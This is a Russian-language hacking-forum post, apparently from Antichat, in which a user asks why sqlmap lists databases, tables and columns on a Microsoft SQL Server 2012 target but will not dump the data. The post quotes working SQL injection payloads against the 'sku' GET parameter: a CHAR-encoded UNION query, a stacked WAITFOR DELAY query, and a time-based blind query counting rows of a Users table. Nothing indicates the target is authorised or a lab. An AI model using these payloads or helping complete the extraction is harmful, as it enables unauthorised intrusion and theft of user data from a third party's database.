
13.01.2014, 16:25
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2012
Сообщений: 1,266
С нами:
7388246
Репутация:
391
|
|
Народ подскажите в чем беда.
использую SQLMAP, язва такого рода
back-end DBMS: Microsoft SQL Server 2012
Place: GET
Parameter: sku
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: sku=-2896' UNION ALL SELECT CHAR(113)+CHAR(118)+CHAR(102)+CHAR(111)+CHAR(113)+ CHAR(121)+CHAR(73)+CHAR(87)+C
HAR(122)+CHAR(67)+CHAR(74)+CHAR(85)+CHAR(104)+CHAR (82)+CHAR(79)+CHAR(113)+CHAR(103)+CHAR(119)+CHAR(1 14)+CHAR(113)--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: sku=USUSUSU'; WAITFOR DELAY '0:0:5'--
имена баз данных достает нормально, таблицы с текущей тоже все ок, колонки с таблицы ок, а вот данные не хочет тянуть!
так пытается достать инфу
sku=USUSUSU'; IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS NVARCHAR(4000)),CHAR(32)) FROM dbname.dbo.Users),1,1))>1) WAITFOR DELAY '0:0:5'--
в чём может быть косяк??? заранее благодарен за ответы!
|
|
|